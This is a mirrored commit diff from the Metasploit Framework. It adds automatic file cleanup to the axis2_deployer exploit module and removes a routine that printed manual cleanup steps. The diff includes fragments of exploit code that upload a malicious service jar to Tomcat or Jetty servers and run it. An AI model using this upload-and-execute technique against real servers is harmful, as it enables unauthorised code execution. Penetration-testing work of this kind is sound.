1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Land #6457, FileDropper for axis2_deployer

This commit is contained in:
William Vu 2016-01-14 15:10:05 -06:00
commit fec75c1daa
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743

View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
@ -74,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_exec(session,rpath)
contents=''
name = Rex::Text.rand_text_alpha(8)
# We must register this file early, that way the on_new_session method
# won't miss it if FileDropper's cleanup routine kicks in.
register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
@ -215,7 +221,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res and res.code > 200 and res.code < 300
cleanup_instructions(rpath, name) # display cleanup info
throw :stop # exit loop
elsif res and res.code == 401
if (res.headers['WWW-Authenticate'])
@ -225,7 +230,6 @@ class Metasploit3 < Msf::Exploit::Remote
if authmsg
print_error("WWW-Authenticate: %s" % authmsg)
end
cleanup_instructions(rpath, name) # display cleanup info
raise ::Rex::ConnectionError
throw :stop # exit loop
end
@ -236,19 +240,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
def cleanup_instructions(rpath, name)
print_line("")
print_status("NOTE: You will need to delete the web service that was uploaded.")
print_line("")
print_status("Using meterpreter:")
print_status("rm \"webapps#{rpath}/WEB-INF/services/#{name}.jar\"")
print_line("")
print_status("Using the shell:")
print_status("cd \"webapps#{rpath}/WEB-INF/services\"")
print_status("del #{name}.jar")
print_line("")
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']